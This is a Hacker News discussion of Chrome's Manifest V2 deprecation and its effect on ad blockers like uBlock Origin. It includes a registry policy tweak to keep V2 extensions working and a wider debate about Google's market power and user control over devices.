Notably, Firefox is not removing v2 support (at least for now as of March 2024)
> Firefox, however, has no plans to deprecate MV2 and will continue to support MV2 extensions for the foreseeable future. And even if we re-evaluate this decision at some point down the road, we anticipate providing a notice of at least 12 months for developers to adjust accordingly and not feel rushed.[1]
[1]: https://blog.mozilla.org/addons/2024/03/13/manifest-v3-manif...
To my knowledge the “big” chrome engine alternatives aren’t either. I know that Vivaldi and Brave plan on keeping around v2 as long as it is economically feasible
Are you certain? The last I heard about it from Vivaldi[0], they were only going to keep the MV2 code around so long as it's in the upstream codebase:
> We will keep Manifest v2 for as long as it’s still available in Chromium. We expect to drop support in June 2025, but we may maintain it longer or be forced to drop support for it sooner, depending on the precise nature of the changes to the code.
Note that June 2025 is the same date Google plans to drop support completely[1].
[0] https://vivaldi.com/blog/manifest-v3-update-vivaldi-is-futur...
[1] https://developer.chrome.com/docs/extensions/develop/migrate...
Vivaldi team does not respond to any comments asking about ongoing v2 manifest support; safe to assume it's gone as soon as it's out of Chromium upstream. Given Tetzchner's continual messaging on how important user privacy is to Vivaldi it seems like a strange decision, but I don't know how much effort would be required to maintain the support. They're a small team, so it would be understandable if they would just say it's too hard, but instead they have avoided the topic entirely, which suggests they agree with the direction.
Or they just don't want to admit publicly that they're too small to maintain a fork when it diverges this much
Well Vivaldi is open source, right? Personally I would be reaching out to Brave, who already plans on maintaining V2 support, and see about a joint venture with a forked chromium.
But... what could possibly be the point of using a chromium based browser that is not Chrome, if not for MV2 support?
In case of Vivaldi, it's features like vertical tabs, and extreme customizability for the built-in stuff (for tabs alone the options dialog is like 3 pages of checkboxes for all the various aspects of how they behave).
Also for those who use cloud bookmark/history/tab sync, people might just not want Google specifically to have that data; Vivaldi does its own sync.
This sounds like Android phone manufacturers making fun of apple for removing the headphone jack and then doing it themselves a year later. Are they seriously going to maintain V2 support for a relatively small percentage of Powerusers which probably are mostly already using Firefox anyways? The point of being economically infeasible is probably in a month or so.
Firefox (and uBlock and BPC etc) works great on Andriod, but you have to disable Chrome to get Google apps to play nice.
I think it comes down to how aggressive Chrome will be at changing the internal APIs that it uses. They could choose to make it a very expensive patch to maintain. But I think they would have to go out of their way to do that.
Microsoft Edge announced the move to Manifest v3 back in 2020 and stopped accepting new code on v2 back in 2022...
https://learn.microsoft.com/en-us/microsoft-edge/extensions-...
Aren't these v2 extensions being removed from Chrome's store? If so, are the alternatives based on Chromium running their own store?
Yeah that's the problem. I used to be on Brave but having to download v2-only extensions[1] manually from each developer's website was a pain. I am on a Firefox-based browser now and it just works.
[1] while pre-existing v2 extensions are still on the store at least for now (e.g. https://chromewebstore.google.com/detail/ublock-origin/cjpal... ) newer ones haven't been able to be added to the store for a long time already, e.g. see https://libredirect.github.io/faq.html#chrome_web_store
Though it is less of an issue for those two, given that they have built-in adblocking. Still a laudable effort.
While adblocking has gotten most of the focus, it isn't the only functionality that is being limited or made more complicated. One of my favorite extensions is still not available for MV3 because of complications: https://github.com/openstyles/stylus/issues/1430
At least when I last tested, Vivaldi on Android's adblocking is pretty far behind uBlock Origin -- it doesn't get nearly as many anti-adblock interstitials as it should.
At this point, I wonder why Firefox doesn't have a vivaldi-like tracker and ad block interface.
Perhaps it has to do with being a Google-funded browser.
I wonder how hard that would be to implement for someone who knew how to do it? Or if the code for that in vivaldi is open source?
It does. Click the little shield in the address bar. I assume it blocks some ads even if it's not as effective as uBlock Origin.
I think the supermium chrome fork plans to keep V2 in.
Along with that, I'd hope they'll add needed support for proper adblocking even with v3 and beyond
But they are removing adblock extensions that use v3
No they removed uBO Lite due to a misunderstanding/mistake and gorhill choose to not bother with Mozilla's annoying "review" process.
Recent and related:
Chrome Canary just killed uBlock Origin and other Manifest V2 extensions - https://news.ycombinator.com/item?id=41757178 - Oct 2024 (46 comments)
That one never made the frontpage, so I'm leaving the current thread up.
"browsers using the ExtensionManifestV2Availability policy will be exempt from any browser changes until June 2025"
To extend ManifestV2 in Chrome, add the text below to a text file, saving and running it as a .reg will create and add a value of 2 to "ExtensionManifestV2Availability" in the HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome key
(When you open/run a .reg file, it updates your registry, usually preceeded by a warning.)
Alternatively, you could do this manually by pressing the Windows key, type "run" (without the quotes) and enter, type "regedit" (without the quotes) and enter, then navigate as far as you can to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome key
You may find there is no "Chrome" key and will need to create it, as well as creating ExtensionManifestV2Availability
--------------------------------------
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome]
"ExtensionManifestV2Availability"=dword:00000002Single command line (Run as Administrator-- you can do that from the Windows key-R dialog by holding CTRL-SHIFT and pressing ENTER):
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome /v ExtensionManifestV2Availability /t REG_DWORD /d 2And IIRC including the quotes in a filename in a save dialog, líke "manifestv2.reg" (incl quotes), will save it with the extension you typed, so you won't end up with 'manifestv2.reg.txt'. So you skip a potentially otherwise needed rename step.
Wow, thanks for this tip. Saves the effort of having to manually find "all types" in the drop down... this is so much easier.
Also, just for clarification:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome]
"ExtensionManifestV2Availability"=dword:00000002
Save the file as:
EnableExtensionManifestV2.regFor people that have somehow missed the story, manifest v3 removed support for certain powerful network apis, severly limiting ad-blockers capabilities. uBlock Origin will not work anymore without manifest v2 (there's a v3 compatible lite version of uBlock Origin).
It's worth noting that the maintenance of the "lite" version is at some nonzero risk of burnout for its developers, ironically in part due to Mozilla being unnecessarily hostile: https://github.com/uBlockOrigin/uBOL-home/issues/197#issueco... discussed at https://news.ycombinator.com/item?id=41707418 - and while there's no plan yet to discontinue the Chrome MV3 compatible version, there are a million ways that this could go wrong.
My only long-term hope for this space is that a nonzero segment of congressional representatives have had ad blockers installed by their aides, realize that their experience online takes a nosedive when MV2 is discontinued, and calls for hearings! Blocking isn't just about not seeing ads, it's about a user's freedom to set up their "user agent" to preserve their privacy online from sites that don't respect their wishes. That's a right that Google is using its market power to erode, and it's not something we should take sitting down.
More on MV3 from a few years ago: https://www.eff.org/deeplinks/2021/12/chrome-users-beware-ma...
> It's worth noting that the maintenance of the "lite" version is at some nonzero risk of burnout for its developers, ironically in part due to Mozilla being unnecessarily hostile:
Why would you even use the lite version on firefox when the original works?
I'm doing all my banking in a separate Firefox profile where uBlock Origin Lite is the only installed extension. So there a zero extensions that have permission to access the pages or requests.
Of course I'm still using the normal uBlock Origin in my main browsing profile.
Lite doesn't require any permissions.
Security and possibly performance, which is the selling point of MV3.
Yup, the MV3 version requires zero permissions and in theory should be faster. These are real benefits that for some reason nobody will admit exist.
Saying anything positive about MV3 or the lite extension seems to get you downvoted without explanation though, which is a nice example of how absurd this site is when it comes to anything related to Google.
Sometimes I think downvoting should require leaving a comment and reason, because I can't see any reason to downvote this other than "google bad".
Sounds like the real issue is "we are replacing X with Y" and there are use-cases for both X and Y to co-exist.
Reason: Removing user control from browsers is strictly bad.
you get to downvote?
When you get Karma of 501 or more…
The "original" UBO is basically the mother of all supply chain vulnerabilities and whenever the inevitable exploit happens, everyone who thought they were a connoisseur of privacy is going to get completely pwned. UBO Lite works without being a gigantic security vuln.
Some people may think what you're saying is outlandish, but it's worth remembering that this is pretty much what already happened to Ublock (which led to the forking of Ublock Origin and return of gorehill)
Not saying it cannot happen, but in Firefox, it is a “Recommended“ extension which gets reviewed per release. A sophisticated attack could slip through, but a ham fisted takeover is unlikely.
I think everywhere that you used “nonzero” you could have also not and it would have still made exactly the same point.
Normally this kind of thing isn’t said in good faith, but it’s actually a way my writing can improve and I appreciate the feedback!
I saw there is a manifest v3 ublock lite.
I don't understand why and how it would be less capable, and so far I have not read the details of how/why.
So far, it's just rumors to me.
I will keep using firefox anyway, but honestly I am still waiting for a clearer explanation.
With manifest v2, the extension could dynamically intercept requests and block them based on a custom rule.
With v3, extensions have to predefine the rules for blocking. Which is the limiting factor
> extensions have to predefine the rules for blockin
And there's a limit of 5000 such rules.
The limit is 330000 rules:
"Based on input from the extension community, we also increased the number of rulesets for declarativeNetRequest, allowing extensions to bundle up to 330,000 static rules and dynamically add a further 30,000." https://blog.chromium.org/2024/05/manifest-v2-phase-out-begi....
Given the size and complexity of modern ad malware I doubt if 330,000 rules is enough, so why limit it?
even if it was infinite that wasn't really the issue, you can't express the algorithms uBlock Origin is using as a static list
That and certain features like the element zapper in uBO aren't available in Lite.
You can't just call stuff you simply don't bother to look up "rumors".
Read up here:
https://github.com/uBlockOrigin/uBOL-home/wiki/Frequently-as...
So because you don't understand it, its rumors? A Simple google search would answer all of your questions in a literal sentence. It removes APIs used by ad blockers.
I've finally switched (back) to firefox today.
I switched from firefox to chrome for their superior devtools a few years back, but hopefully firefox has had time to catch up.
Everything old is new again!
IMO they are still not as good although they have improved. I just develop in chrome and use Firefox for everything else.
What makes them less good? I'm used to Firefox and while the Chrome devtools have more features they're harder to use (eg smaller touch targets, can't accept JS suggestion with enter key)
I use FF and my coworker uses Chrome. He says the thing that pisses him off the most when watching me use FF is that there is no fuzzy search when manually applying styles. I.e. you have to search "justif..." to see "justify-self". You can't just search "self". That's the only example I've really noticed between the two but I'm sure there are more. It doesn't bother me enough to change though.
I know chrome dev tools are capable, but to me they feel much more dumb and convoluted. There's lots of convenience and golden nuggets in Firefox dev tools that makes you feel they've been designed by and for developers.
Same. I use Chromium for dev and firefox for browsing
This is why we need to break up Google.
Google is a de facto monopoly. They own the entire web. The gateway, the browser, the protocols, advertising, discovery.
Google is too big.
Sure, but we saw this coming a mile away (as in, people have been saying this about Chrome for about a decade). People--especially tech nerds--didn't have to switch to the closed source, conflict-of-interest, browser. But, everyone did, and this is what we get for it. We now have proprietary DRM built in to the web standards, and all kinds of other bullshit, because a bunch of people decided to not learn any lessons at all from Microsoft and Internet Explorer.
But, every time Mozilla does something slightly abrasive, HN users pile on about how Mozilla is ruining their privacy-respecting reputation, and then go back to using Chrome... The double-standard is really something else.
Maybe instead of getting someone else to break up Google for us, we could just... stop using their shit? I'm typing this from Firefox, I use Proton Mail (and pay for it!) for email, and I mostly search with DuckDuckGo (I know that's not perfect, either). I certainly don't feel like I'm living like a caveman...
/rant
> People--especially tech nerds--didn't have to switch to the closed source, conflict-of-interest, browser.
Do you not remember all the ads promoting chrome? First was chrome-frame IE extension, then came all the ads - then tie-ins where you got Chrome in addition when you really wanted some other app.
They pushed it hard because they knew they had no real competitors and could eat up marketshare.
Chrome won because it was more performant (read: only point of interest for Joe Average) and it was modern and cool (read: only point of interest for nerds).
Firefox failed because it stagnated on performance and code quality (read: memory leaks for daaaaaaaaays) and ultimately because Mozilla was corrupted by Mitchell Baker and still is to this very day driving away nerds and engineers by the truckload.
Lest we forget, Internet Explorer lost to Firefox despite bundling with Windows. Edge still loses to Chrome despite bundling with Windows. Safari despite bundling with iOS and MacOS only survives thanks to the Walls of Applestantinope holding against the SelEUk Empire's onslaught.
Google made something better than what existed with Chrome, it was obvious it would capture the market significantly especially among more technical people.
I don't think the fact that Chrome is (was) better is the question, it's a question of how they got here.
Google took tons of money and threw it into Chrome and therefore developed something better. It's better because Google put more money into it than anyone else would have because, in the absence of considering using it to enshrine their search and ad revenue, it wouldn't make sense.
Isn't this part of the antitrust test?
It was only true that Chrome was significantly superior (performance-wise, anyway) for a little while. Firefox had to play catch up and it took several years. It was (mostly) called the "electrolysis" (a.k.a., "e10s") project. It was considered complete by 2018, and had already offered significant performance and stability improvements for years before then.
I wouldn't be surprised if Chrome still performs better on Google-owned web sites, for obvious reasons. But, nobody is really going to notice a difference between Firefox and Chrome when visiting, e.g., your bank's web site.
So, it's been somewhere between six and eight years that Firefox has had comparable performance, comparable web dev tools, and way cooler extensions. I'm sure plenty of people will reply that this isn't true and there was some website just this week that FORCES them to stay with Chrome because they noticed a jitter once, but people on the internet are top-tier experts at rationalizing and I don't buy it.
We could've all jumped on board with Firefox when the e10s project landed, but nobody did because it was just slightly less convenient to switch than to not. I hope it was worth it for them.
> I wouldn't be surprised if Chrome still performs better on Google-owned web sites, for obvious reasons.
Most websites (except for those doing some really fancy stuff with new experimental web apis) tend to work just fine in Firefox. Google's sites are the only ones I regularly encounter that perform terribly and leak memory continuously.
Meh, the "slightly abrasive" stuff Mozilla is doing is stuff like buying up ad analytics companies and adding features to help ad tracking companies track users. Fuck Mozilla, and fuck Google even more.
I admire your optimism by the way that a few technologists saying "stop using Chrome, Google is evil, use Firefox" is enough to overcome the market dominance of a monopoly like Google's, but I sadly don't share it. People have been saying it (and similar things, like "don't use Windows, Microsoft is evil, use Linux") for decades with little success. Even the few people who do get swayed will switch back after a few instances of "I was late for my important meeting/was unable to open this important document because the website didn't work with Firefox".
Most people's tech choices are deeply pragmatic and based on familiarity. And to expect anything else is honestly foolish, in my opinion.
This is coming from a Firefox and Linux user by the way.
> tech nerds you would be surprised how many devs these days have drunk the big tech coolaid.
leetcode all the time and dream of working at google and using chrome and writing javascript.
if the tech nerds took a stand and used firefox en masse, we wouldn't have this problem.
unfortunately it is now normie season. we have to travel through these dark times.
There's still hope. I would like to draw a parallel to Microsoft Windows, with my own narrative added over.
Tech nerds mostly knew that Windows was not a good server operating system. It was also not a fantastic software development environment unless you were using a big, all-inclusive, IDE that was probably aimed specifically at developing Windows libraries and applications.
But, Windows was (and still is) the choice for normies by a WIDE margin.
The tech nerds continued to mostly ignore Windows for server stuff, and more and more ignored it for other dev stuff, too (many migrating to Macs, some to Linux, etc).
If you have a lot of users, but no developers on your platform, you're playing a dangerous game. Eventually Microsoft found a way to have Linux running in Windows. I don't know or care if that "saves" Microsoft or Windows or whatever, but I do see that as a win for the tech nerds.
All we have to do is get the tech nerds to stop using Chrome. Chrome can't survive forever if the nerds stop using Chrome, if we stop optimizing our web pages specifically for Chrome, and if we stop writing and maintaining extensions for it.
Eventually, they'll probably cave and put back more stuff to make the nerds happy, in order to bring them back to the platform and save their normie userbase. Either that or Chrome will die. Both are fine with me.
> All we have to do is get the tech nerds to stop using Chrome. Chrome can't survive forever if the nerds stop using Chrome, if we stop optimizing our web pages specifically for Chrome, and if we stop writing and maintaining extensions for it.
Agreed 100% with this.
their dev environment is still pretty bad
Have you seen Mozilla leadership team though? That is something else altogether.
Hopefully this is the inflection point for Chrome. Despite all their made-up "security" reasons, everyone knows this is solely about making adblock less effective. For many users, adblock is what makes chrome bearable - and if they make it unbearable, then those users will leave. Slowly but surely.
Google seems much too sure of itself making this change. I hope their arrogance pays off just the same as Microsoft's did with IE.
Agreed on hoping this is the inflection point, but only partial agreement that it's about adblock. For sure Google wants adblock to die, but I think it goes even deeper than that.
I think it's part of a much bigger trend in tech in general but also in Google: Removing user control. When you look at the "security" things they are doing, many of them have a common philosophy underpinning them that the user (aka device owner) is a security threat and must be protected against. Web integrity, Manifest v3, various DoH/DoT, bootloader locking, device integrity which conveniently makes root difficult/impossible, and more.
To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in. The next generation won't have the wonderful and fertile computing environment that we enjoyed, and it's (partly) your fault.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
I recently quit my job, developing among others the means to "protect" media using DRM. While this was not a primary motivation, I'm glad to somewhat clean my hands.
The technology (dubbed Common Encryption) is a bunch of smoke and mirrors that a childishly easy to hack around. Yet clearly aimed against good faith consumers.
That's a good job - people who don't like DRM (you) get more money, and the bad DRM is a distraction that delays the implementation of good DRM.
It is important, I think, to understand that personal computing is just one part of the picture. "Enterprise" environments (governments, businesses, large organizations, etc.) have demanded many of these "features" even before Google started implementing them. Your workplace, by and large, does not want you, the replaceable person who happens to be sitting at the keyboard, to be in full control of the device that they own and which is connected to their network. Often this is made more explicit by the device just being a "thin client" or other totally locked down narrow viewport to some other computer you can't even touch. It sucks and the general trend of workplaces trusting their employees less and less has been demeaning and degenerative to the point of often fostering self-fulfilling prophecies of mistrust (don't trust anyone => get untrustworthy people => bad things happen => don't trust anyone => ...).
However, it is important to also understand that the employee is not the only stakeholder. Government agencies answer to legislators, nonprofit management answer to donors, corporate management answer to investors, etc. There are layers of compliance that must be considered as well (internal policies, external regulations, different insurance costs, etc.). It is unsurprising that these fewer but generally deep-pocketed entities have an outsized influence on the market compared to more numerous but less moneyed end users. If you refuse to serve the former, you may quickly find yourself out of business.
Then they could have made Mv3 an option to turn on by sysadmins who lock down their browsers. If you aren’t locking down your users browsers then that’s on you. I mean at worst they could have made mv2 opt-in and most people would have highly curtailed their complaints of “I’ll jump ship to _____________” . People don’t like it when features are removed especially when there are viable alternatives like, adding a special tier of review to get mv2 approval for your extension, opt-in/out as discussed, easy access by sysadmins to turn it on/off. Instead google pulled a bully “so, pencil-neck, what are you gonna do about it?” instead. They are tone-deaf and see themselves as the new 800lb silverback on the block.
I was mostly commenting on the "broader trend" aspects and the assignment of primary blame to implementing engineers.
There's another problem with Chrome, which is that nobody is actually paying for it. So the big corps move features along there only in the sense that they won't adopt it or will drop it otherwise. I don't think the big corps are pushing for Mv3 but they also probably don't care that it arrives either. Conversely, I wager Google estimates nearly nobody will revolt and leave Chrome over the loss of Mv2. It hurts ad-blocker developers and it hurts the most conscious users, but Chrome is a marketing product targeted at mass adoption first and foremost. I personally hope their estimation is wrong and the current browser monopoly breaks, but this may not yet be the breaking point.
Even if that happens, Chrome eagerly adopting enterprise policy support may keep it on life support in that environment, though.
> It sucks and the general trend of workplaces trusting their employees less and less
You get what you pay for. Seeing that employee retention is frowned upon.
The technologies themselves are mostly a good idea. The problem is that the companies designing them also like to abuse them.
Take, for example, hardware attestation on android. There's not really any serious issue with this feature, it can be used to ensure your device is not compromised. This is for example how GrapheneOS enables its use with the auditor application.
But, on the other hand, Google abuses the feature to ensure that you are running a google signed OS if you want to use Google Pay. Meanwhile you can use banking apps which also use hardware attestation (although, from their perspective, they don't use enough of it to ensure it isn't being spoofed, and even then...) without any problem on GOS. Moreover, before Google Pay completely killed all of its competition, it was possible to even find third party banks which would provide you with the ability to pay with your phone without using google pay.
Likewise, secure boot is a great concept if you want to be more sure about the integrity of your laptop throughout its lifetime. But some companies have abused it to force you to use Windows. If you want to set up your own signing keys for secure boot, you end up having to deal with poorly managed UEFI keys from third parties which weaken the security of your machine. The feature, as it's implemented, is rarely designed with helping end user's secure their machines. But the core of the design is fine.
I think limiting root on a phone is also a really good idea, the issue is that Google likes to give themselves and their "system apps" special privileges. If APIs were exposed to allow you to bless your own applications with the right permissions, you would probably not care so much about root restrictions.
So all in all, fundamentally, most of these features are fine. They're genuinely great for security. But the main problem is how they're abuse by the companies in control and how little effort is put into allowing power-users to use those features for their own benefit.
No disagreement here, although if past experience has proven anything I think it's that companies will abuse whatever "security features" they can to accomplish their objectives. It reminds me a lot of the old adage, "the same wall can keep people in just like it can keep people out."
When the OS is fundamentally in the user's control, they are limited in what they can do, but when the OS disregards it's owners preferences/desires and enforces it's creators desires.
Minor thing actually:
> If APIs were exposed to allow you to bless your own applications with the right permissions, you would probably not care so much about root restrictions.
I absolutely agree with this in theory, but in practice I'm not sure it would ever work because they just aren't going to put in the work to build and maintain APIs for things they don't care about, and there would be a very long tail of things to do (and sometimes those things are legitimately a lot of work). Call recording being a classic example.
But all in all, I very much agree. I love those features when they are in my control on my devices. Biggest issue is, they virtually never are and the number of occurences is trending down.
Anyway,
I get why they built in all of those protections; the vast majority of tech users are not knowledgeable about the details of the stuff they use. And I think a big chunk of those that are, overestimate their own abilities, knowledge, and control. They all need to be protected against themselves.
That said, I don't like that the choice is being taken away. If you do want to tinker at that level with the technology you own, you should be given the choice. By all means make it not obvious how to get there - like, have people reboot their computers while playing Twister on their keyboards with interesting key combos, but give them the option.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
That was a world where the user base was much more limited and devices were less capable. Now we have children, grandparents, educated, and uneducated users with access to web connected devices. These devices now contain everything about you. Compromise of a device can destroy someone’s life.
Not only that, but compromise of a device can cause collateral damage to other devices on the same network.
We now have to cater to every user. Not just to the technologically adept. Look at what people believe on social media. The bar is so low to con people into compromising their device.
The problem is one of balance.
Write insecure software and you'll get screwed by hackers. Write secure locked down software nobody can touch or modify, and you'll get doubly screwed by a large corporation that wants to pound every penny they can out of your bloody corpse, upto the point your device is compromised by the corporation who can do whatever they want, but you cannot tell.
There is no win situation here, there are only trade offs.
Still a shit poor pathetic excuse to screw over the userscript/grease monkey users.
The browser is called a user agent, but this shift to absolute security no matter what, no say about it is a shift to native apps, is a shift to the developer is in control, is a shift to this being Google and the sites browser, not ours, and that being done unilaterally with nearly no opt outs is the sort of mega tectonic shift that ruins this magical special unique place in software where users had some say in what was happening. We cannot pander to imagined ever worsening users forever.
It feels like the things being done in the name of security are really building an immense prison. The work being done to allow verified age and identity checking ranks up there highly in the this corals humanity, area, not giving us agency.
> Still a shit poor pathetic excuse to screw over the userscript/grease monkey users.
Tampermonkey still works fine with MV3
> We cannot pander to imagined ever worsening users forever.
The most popular software/hardware will always pander to the most users. That’s why they’re the most popular.
You can’t complain about the most popular option pandering to the most users. Well, you can complain, but you might be in the minority of the users.
> It feels like the things being done in the name of security are really building an immense prison.
I get that, but we are running so much untrusted code on our machines now. Applications that use thousands of dependencies with the hope that someone spots a bad actor.
yes, iOS now restricts Apps from getting blanket access to their contacts, photos, and even clipboard. On the one hand, it does protect the user from malicious Apps that trick users into giving blanket access. On the other hand, they could have atleast done it like location access - where user still has an option to give blanket access. It is not fair that Siri is the only one that can access these things now.
That's literally how iOS works today. If I go into Settings > Privacy & Security > Photos, I can give apps None, Limited Access, or Full Access. Same with Contacts, same with the clipboard (where the per-app choices are Ask, Deny, or Allow).
> It is not fair that Siri is the only one that can access these things now.
That would be true if it was, but it isn't.
It can. You can still give apps access to all of it with a single press.
And manifest v3 makes things a bit more tedious but not impossible. There are other adblockers which still function just fine
Their incentive is really to make the Chrome Web Store a tractable problem with minimal human effort. That's about 75% of the incentive. You can't actually make any guarantees at the CWS level regarding safety of audited code if the API allows audited code to execute non-audited code.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
May I be blunt? I grew up in it, so yes. I am. I was there for the Windows virus wildfires. I was there for the malware distribution schemes. I was there for the first wave of enshittification. For the dotcom crash. For the spam wars. For the search engines that didn't work. For the JavaScript injection attacks. For the world where "nobody knew you were a dog" as long as you didn't talk like yourself. I couldn't trust most of my relatives to use a computer the way we had to use them in the late '90s / early aughts. That's not a problem now.
For all its flaws, the modern system is cleaner, simpler, faster, and better for end users and no longer requires them to be super-nerds (and meanwhile, open and malleable devices are still there for the super-nerds to play with and work with). This was the goal---to make computers something that benefit everyone, not just the technorati and the priest-class.
May the past become a foreign country, hard for the modern mind to comprehend. May it always be so.
Adblock doesn’t only make Google Chrome bearable, it makes the internet bearable. I recently uninstalled my Adblock for testing purposes. Most websites nowadays are just ads with a little bit of text in between
I'd like to think that's true, but I don't know, because people seem to have a very high tolerance for advertisements. Surprisingly so. I have a very low tolerance, and do what I can to get rid of them. But then, every once in a while I use someone else's computer and see how they live with them. I say "I can show you how to get rid of those ads," but they usually just don't care enough to do it. I bet the majority of people are like that—maybe the vast majority—and Google is probably making the same bet, but with even more information. My prediction is that if (God willing) Chrome loses significant market share, it'll be for some other reason than this.
> Hopefully this is the inflection point for Chrome.
Here is one empirical data point.
I switched over to Firefox this morning and will advocate for it.
I've considered it for a while, but I never felt motivated to make the switch. It took me a good half hour to set it up the way I like it.
I've been checking browser stat counters religiously, looking for evidence that this change is driving their numbers down. No luck so far.
Am I missing any? https://gs.statcounter.com https://analytics.usa.gov https://www.w3counter.com
The widespread adoption of Chrome was largely driven by word of mouth, people like you and I installing it on our friend's/relative's computers and telling them it was safer/faster/better.
Nothing stops us from doing the same thing again. I've been recommending Firefox to all my family/friends/colleagues for years (ever since I've seen the writing on the wall for Chrome). While Firefox isn't perfect, it's in a much better place than Chrome is, and meets the the needs of nearly 100% of people.
>The widespread adoption of Chrome was largely driven by word of mouth
No, it was driven by having a banner in the most privileged spot of the Internet, Google.com (the most visited site in the world with 0 ads on the homepage) saying that was faster and more secure than the alternatives. In fact Firefox benefited from some free ads on Google.com against Internet Explorer before Google developed Chromium.
The other aspect, somewhat memory-holed, was that Chrome was automatically installed as shovelware if you went to install Adobe Flash for IE or Firefox:
https://www.reddit.com/r/chrome/comments/23jnmy/why_is_chrom...
This kind of not-freely-given consent was key to Chrome's growth.
Chrome was bundled with so many installers. Google probably spent billions shoving Chrome into any machine they could.
It was kind of both, depending on the timeline. Early on it was word of mouth, then Google saw they had momentum and they capitalized on it with the banners and aggressive marketing.
They were pushing from the very start. They knew the potential of taking over the browser market share.
It was a long time ago but I'm 99% sure that there was a banner for Chrome on Google.com since the first public release.
… isn’t that banner an ad?
Yeah, I feel like in general we on HN give ourselves way too much credit in terms of our ability to drive public opinion or affect purchasing/usage patterns among the public. The idea of the “nerd-led revolution” may have had some impact in the past, but I think the days of that are over. Large corporations now know what they’re doing in ways that they hadn’t figured out in the 2000s or even the early 2010s.
Early chrome was driven by the fact that firefox was a piece of garbage. Firefox 3 was not good software, and had an unpleasant habit of totally crashing the entire browser regularly. Your only other popular choice was ie8. Also not great.
Later Google's ability to buy installs and put it on google.com came into play, but for at least the first 5 years and probably longer, chrome was a far faster, more secure, and more reliable choice. They also pioneered the multi-process model to isolate different components of the browser.
I swear I also remember it getting included in installation wizards for unrelated software (on Windows), so people would end up with Chrome/Chromium without even realizing it.
I’ve been out of the windows game for so long I forgot all that malware that was installed by various installer engines and was so relieved when I found portable apps and oldversion.com and ninite. And now I guess there are things like chocolaty that do similar things. Switching to Mac and Linux I don’t really miss it at all
Did you miss the barrage of ads for Chrome that google played for literally years on the internet and television?
I'd argue it won't make a dent in Chrome market share.
People who really care about this (tech minded people) are not using Chrome anyway, others (regular people) will switch to less powerful Manifest V3 adblockers that would probably be good enough and won't switch from Chrome.
The vast, vast, majority of normies I know use Google Chrome and use zero extensions.
What makes you say the security reasons are made up?
> making adblock less effective
adblocking still works just fine on Safari, which has been doing the same thing as Manifest V3 for years now.
Ad-blockers are not just about displaying the actual ads.
Does the Chrome blocks trackers even without ad-blocker Like Safari?
So, are you going to leave chrome then?
> everyone knows this is solely about making adblock less effective
I thought I knew that.
Then I switched from uBlock Origin to uBlock Origin Lite in Chrome, which is compatible with Manifest v3. I was prepared for the horrible onslaught of ads, expecting at least a quarter would start getting through, ready to switch to Firefox...
...and didn't notice a single change. Not a single ad gets through.
And at the same time, loading pages feels a little faster, though I haven't measured it.
Which has now got me wondering -- what if Manifest v3 really was about security and performance all along?
Because if Google was using it to kill adblockers, they've made approximately 0% progress towards that goal as far as I can tell. If they really wanted to kill adblockers, they'd just, you know, kill adblockers. But they didn't at all.
This is just because Google was especially insidious about how they crippled ad blockers in v3.
Adblockers do multiple things:
1. Visibly block ads from the user
2. Block the user tracking that's attached to those ads
3. Protect the user from malware
4. Save bandwidth and cpu cycles by not loading all that junk
5. Allow control to users over how a webpage is displayed to them
Arguably uBlock Origin Lite can only accomplish some of #1 and a sprinkle of #2 now. And even those abilities are compromised by artificially low limits imposed by chrome in v3 that will eventually allow ad networks to overwhelm those limits and get ads through to users.
Google is 100% boiling the frog here and you/the average user is left in the pot unaware.
uBlock lite can accomplish 2, 3, 4 completely. It's only #1 and #5 that are truly affected by v3. But those two were already pretty limited in chrominum browsers compared to firefox.
It can only accomplish #1 and #2 for 30k rules, most of which must de defined at the time of the extension release/update. As soon as that limit is exceeded an adblocker loses it's ability to accomplish #1, #2, #3, #4, or #5 effectively.
And if we are being honest about those limits, they have already been exceeded. Ublock origin is going from 100,000 to 500,000 dynamic rules to just 30k rules(only 5k of those can be dynamic) in the lite version.
Adblockers have absolutely been neutered in v3.
I don't think any of that is accurate though.
Manifest v3 blocks user tracking -- if the request is blocked, any tracking attached to it is blocked. I'm sure it's not 100% perfect, but it's certainly working well enough in practice.
And what malware are you talking about? If a request is blocked, it's blocked. It doesn't matter if it's an ad or malware.
Manifest v3 is better at #4, because the junk isn't loaded, and the blocking is more efficient in terms of CPU.
And then #5 I don't know what you're talking about. I use Stylus and Tampermonkey to customize webpages and they continue to work great.
So I just don't see the evidence that "Google is 100% boiling the frog here". That's what everyone was saying, but now that Manifest v3 has come out, I just see adblocking that continues to work and uses less CPU to do it.
I see a lot of fearmongering around Google, but now that the results are in with Manifest v3... they just don't seem true. You're making all these claims, but I just don't see the evidence now that we're seeing how it works in practice.
Explain to me how uBlock Origin can realistically go from 100,000 to 500,000 dynamic rules down to 30k rules(only 5k of those can be dynamic) in the Lite version without losing the ability to actually block everything?
These limits are easy targets for ad networks to overwhelm or outmaneuver.
That's what everyone was saying
No one was saying that adblockers would literally stop working, so it's beyond disingenuous to dismiss people's issues with these changes by just saying 'works for me'.
What evidence would you actually accept anyway? Do you need a leaked internal document from Google saying literally 'devs, go neuter adblockers' before you believe Google might have bad intentions surrounding people's ability to block ads and tracking?
If security and performance were the actual driving forces of DeclarativeNetRequest, then they would have simply added it in addition to the existing webRequest block functionality. uBlock Origin and most extensions would have happily moved the majority of their rules to the static list if it meant better performance and privacy while keeping around the webRequest blocks for the things that actually need it.
Google has gone from having only one nuclear-level option for influencing adblockers (aka delisting) to now having its boot softly pressed against their necks and plenty of levers to pull. And you want me to look at that and go, 'There's no direct evidence of malicious intention there... so perfectly normal and/or acceptable behavior by the world's biggest ad company'?
> Explain to me how uBlock Origin can realistically go from 100,000 to 500,000 dynamic rules down to 30k rules(only 5k of those can be dynamic) in the Lite version without losing the ability to actually block everything?
I don't know and I don't have to. All I know is uBlock Origin Lite is still blocking everything. So it seems like 30K rules is plenty? Like it's not a meaningful difference for end users if it's blocking 99.99% vs 99.9999% of ads?
